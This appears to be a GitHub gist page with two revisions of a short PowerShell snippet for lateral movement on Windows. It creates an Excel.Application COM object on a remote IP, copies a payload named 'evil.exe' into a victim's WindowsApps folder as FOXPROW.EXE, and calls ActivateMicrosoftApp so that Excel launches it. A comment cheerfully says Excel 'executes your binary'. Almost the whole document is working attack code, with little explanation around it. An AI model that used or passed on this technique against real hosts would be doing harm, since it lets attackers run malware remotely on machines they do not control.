Last active
September 14, 2017 15:06
-
-
Save rxwx/518c85863c7eed051361b36a293f15b1 to your computer and use it in GitHub Desktop.
Revisions
-
rxwx revised this gist
Sep 11, 2017 . 1 changed file with 1 addition and 1 deletion.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -1,4 +1,4 @@ $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", "192.168.1.111")) # Windows 10 specific, but searches PATH so .. copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE $excel.ActivateMicrosoftApp("5") -
rxwx created this gist
Sep 11, 2017 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,5 @@ $excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application")) # Windows 10 specific, but searches PATH so .. copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE $excel.ActivateMicrosoftApp("5") # excel executes your binary :)